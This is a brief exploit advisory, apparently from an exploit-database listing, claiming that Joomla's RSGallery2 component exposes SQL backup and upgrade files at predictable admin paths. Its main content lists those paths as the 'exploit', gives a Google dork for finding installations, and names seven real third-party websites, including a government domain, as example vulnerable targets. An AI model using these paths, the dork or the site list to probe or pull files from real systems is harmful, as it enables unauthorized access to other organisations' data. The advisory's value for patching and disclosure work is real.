################################################################################################# # Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/12/2018 # Vendor Homepage : rsgallery2.org ~ extensions.joomla.org/extension/rsgallery2/ # Software Download Link : rsgallery2.org/index.php/download + github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip + github.com/RSGallery2/RSGallery2_Component/releases + github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql + github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2 # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0 ~ 4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2 # Exploit Risk : Medium # Google Dorks : inurl:''/administrator/components/com_rsgallery2/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /administrator # Exploit : /administrator/components/com_rsgallery2/sql/rsgallery2.sql /administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql /administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql /administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql /administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql /administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql /administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql /administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql /administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql /administrator/sql/updates/mysql/3.0.0.sql /administrator/sql/updates/mysql/4.0.0.sql /administrator/sql/updates/mysql/4.3.0.sql /administrator/sql/updates/install.mysql.utf8.sql /administrator/sql/updates/uninstall.mysql.utf8.sql ################################################################################################# # Example Vulnerable Site => [+] itsi.co.id/administrator/components/com_rsgallery2/sql/rsgallery2.sql [+] theglen.ca/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql [+] airnews.co.za/home/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql [+] osmiebkk.moe.go.th/2-administrator/components/com_rsgallery2/sql/rsgallery2.sql [+] bunker.linkbg.com/polifron/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql [+] protech-me.com/httpdocs/administrator/components/com_rsgallery2/sql/rsgallery2.sql [+] wohnbautreppen.com/treppen/administrator/components/com_rsgallery2/sql/rsgallery2.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################